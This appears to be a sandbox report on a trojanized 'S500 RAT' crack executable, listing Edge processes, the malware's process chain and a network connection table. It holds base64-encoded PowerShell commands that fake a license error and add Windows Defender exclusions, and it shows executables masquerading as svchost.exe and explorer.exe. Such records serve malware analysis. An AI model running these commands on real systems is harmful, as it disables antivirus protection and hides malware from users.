"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10212 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8

C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe

"C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGkAZAB4ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACEAIABMAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIABnAHIAbwB1AHAAIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBwAG0AZAAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

"C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Users\Admin\AppData\Roaming\explorer.exe

"C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat

C:\Windows\system32\taskkill.exe

taskkill /f /im "explorer.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2440 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 file.io udp
US 45.55.107.24:443 file.io tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 18.239.94.43:443 www.file.io tcp
US 8.8.8.8:53 218.110.86.104.in-addr.arpa udp
US 151.101.3.42:443 hb.vntsm.com tcp
US 151.101.3.42:443 hb.vntsm.com tcp
US 104.22.46.142:443 hb.vntsm.io tcp
US 45.55.107.24:443 file.io tcp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 142.251.173.155:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 155.173.251.142.in-addr.arpa udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
GB 172.217.16.226:443 securepubads.g.doubleclick.net tcp
BE 142.251.173.155:443 stats.g.doubleclick.net udp
GB 172.217.16.226:443 securepubads.g.doubleclick.net udp
GB 172.217.169.3:443 www.google.co.uk tcp
US 172.67.69.19:443 ad-delivery.net tcp
GB 172.217.169.3:443 www.google.co.uk tcp
US 8.8.8.8:53 cdn.exelator.com udp
NL 18.239.70.203:443 c.amazon-adsystem.com tcp
NL 18.65.39.103:443 cdn.exelator.com tcp
NL 18.239.83.89:443 cmp.quantcast.com tcp
NL 18.239.70.203:443 c.amazon-adsystem.com tcp
NL 18.65.39.103:443 cdn.exelator.com tcp
NL 18.239.83.89:443 cmp.quantcast.com tcp
NL 18.238.243.129:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 104.22.52.86:443 cdn.id5-sync.com tcp
US 172.67.36.110:443 cdn.hadronid.net tcp
GB 104.78.175.230:443 secure.cdn.fastclick.net tcp
GB 104.78.175.230:443 secure.cdn.fastclick.net tcp
US 8.8.8.8:53 id.hadron.ad.gt udp
US 8.8.8.8:53 103.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 89.83.239.18.in-addr.arpa udp
US 8.8.8.8:53 129.243.238.18.in-addr.arpa udp
US 8.8.8.8:53 86.52.22.104.in-addr.arpa udp
US 8.8.8.8:53 110.36.67.172.in-addr.arpa udp
US 8.8.8.8:53 230.175.78.104.in-addr.arpa udp
US 104.22.4.69:443 a.ad.gt tcp
GB 104.86.111.153:80 apps.identrust.com tcp
NL 18.239.36.42:443 cmp.inmobi.com tcp
NL 63.215.202.146:443 proc.ad.cpe.dotomi.com tcp
US 172.67.23.234:443 a.ad.gt tcp
N/A 224.0.0.251:5353 udp
DE 18.197.41.136:443 api.cmp.inmobi.com tcp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 elb.the-ozone-project.com udp
NL 18.239.88.34:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 prg.smartadserver.com udp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 apex.go.sonobi.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
NL 145.40.97.67:443 prebid.a-mo.net tcp
DE 3.78.168.176:443 tlx.3lift.com tcp
DE 37.252.172.123:443 ib.adnxs.com tcp
US 69.166.1.8:443 apex.go.sonobi.com tcp
FR 185.86.139.85:443 prg.smartadserver.com tcp
FR 185.86.139.85:443 prg.smartadserver.com tcp
US 172.64.144.78:443 elb.the-ozone-project.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
DE 18.198.238.120:443 btlr.sharethrough.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
IE 52.18.58.124:443 track.venatusmedia.com tcp
IE 67.220.226.238:443 aax-eu.amazon-adsystem.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
DE 162.19.138.117:443 id5-sync.com tcp
NL 213.19.162.80:443 pixel.rubiconproject.com tcp
US 104.22.4.69:443 pixels.ad.gt tcp
US 172.67.23.234:443 pixels.ad.gt tcp
US 172.67.23.234:443 pixels.ad.gt tcp
GB 142.250.178.2:443 cm.g.doubleclick.net tcp
GB 142.250.178.2:443 cm.g.doubleclick.net udp
US 172.67.23.234:443 pixels.ad.gt tcp
US 104.22.4.69:443 pixels.ad.gt tcp
NL 46.228.174.117:443 sync.1rx.io tcp
DE 141.95.98.65:443 id5-sync.com tcp
US 34.98.64.218:443 u.openx.net tcp
US 8.8.8.8:53 77.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 120.238.198.18.in-addr.arpa udp
US 8.8.8.8:53 8.1.166.69.in-addr.arpa udp
US 8.8.8.8:53 124.58.18.52.in-addr.arpa udp
US 8.8.8.8:53 238.226.220.67.in-addr.arpa udp
US 8.8.8.8:53 80.162.19.213.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 117.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 117.174.228.46.in-addr.arpa udp
US 8.8.8.8:53 218.64.98.34.in-addr.arpa udp
US 8.8.8.8:53 65.98.95.141.in-addr.arpa udp
IE 52.30.187.129:443 p.cpx.to tcp
DE 91.228.74.166:443 pixel.quantserve.com tcp
US 34.120.111.33:443 api.edkt.io tcp
US 104.18.23.145:443 cadmus.script.ac tcp
US 104.26.8.169:443 script.4dex.io tcp
US 45.55.107.24:443 file.io tcp
GB 142.250.187.193:443 76a1b382011ec77ba8bbd4c16d10b327.safeframe.googlesyndication.com tcp
US 104.22.4.69:443 pixels.ad.gt tcp
US 44.205.54.254:443 onsite-tag-logs.apps.nielsen.com tcp
GB 2.23.161.247:443 tg1.aniview.com tcp
US 104.26.8.169:443 script.4dex.io tcp
US 34.95.69.49:443 i.clean.gg tcp
NL 18.239.50.115:443 rules.quantcount.com tcp
IE 108.128.16.222:443 s.cpx.to tcp
GB 142.250.200.33:443 tpc.googlesyndication.com tcp
US 34.95.69.49:443 i.clean.gg udp
US 34.120.111.33:443 api.edkt.io tcp
NL 208.93.169.131:443 bh.contextweb.com tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
IE 52.48.120.118:443 ad.360yield.com tcp
US 34.120.111.33:443 api.edkt.io udp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
GB 216.58.212.226:443 googleads.g.doubleclick.net tcp
FR 185.93.2.248:443 cdn1.vntsm.com tcp
GB 142.250.200.33:443 tpc.googlesyndication.com udp
